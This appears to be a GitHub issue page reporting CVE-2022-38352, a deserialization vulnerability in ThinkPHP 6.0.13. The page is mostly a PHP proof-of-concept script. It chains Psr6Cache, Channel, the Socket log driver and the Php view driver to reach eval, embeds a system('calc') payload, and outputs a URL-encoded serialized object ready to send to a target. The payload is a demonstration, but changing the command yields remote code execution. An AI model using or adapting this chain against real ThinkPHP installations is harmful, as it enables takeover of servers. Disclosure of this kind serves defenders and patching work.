Headline
CVE-2022-38352: There is a new exploit chain for the deserialization vulnerability of thinkphp 6.0.13 · Issue #2749 · top-think/framework
ThinkPHP v6.0.13 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\Psr6Cache. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
Any method of any class, where eval is called to execute php code, thereby executing php and writing to a file.
<?php
namespace League\Flysystem\Cached\Storage{
class Psr6Cache{
private $pool;
protected $autosave = false;
public function \_\_construct($exp)
{
$this\->pool = $exp;
}
}
}
namespace think\log{ class Channel{ protected $logger; protected $lazy = true;
public function \_\_construct($exp)
{
$this\->logger = $exp;
$this\->lazy = false;
}
}
}
namespace think{ class Request{ protected $url; public function __construct() { $this->url = ‘<?php system(\’calc\’); exit(); ?>’; } } class App{ protected $instances = []; public function __construct() { $this->instances = ['think\Request’=>new Request()]; } } }
namespace think\view\driver{ class Php{} }
namespace think\log\driver{
class Socket{
protected $config = \[\];
protected $app;
protected $clientArg = \[\];
public function \_\_construct()
{
$this\->config = \[
'debug'\=>true,
'force\_client\_ids' => 1,
'allow\_client\_ids' => '',
'format\_head' => \[new \\think\\view\\driver\\Php,'display'\], \# 利用类和方法
\];
$this\->app = new \\think\\App();
$this\->clientArg = \['tabid'\=>'1'\];
}
}
}
namespace{ $c = new think\log\driver\Socket(); $b = new think\log\Channel($c); $a = new League\Flysystem\Cached\Storage\Psr6Cache($b); echo urlencode(serialize($a)); }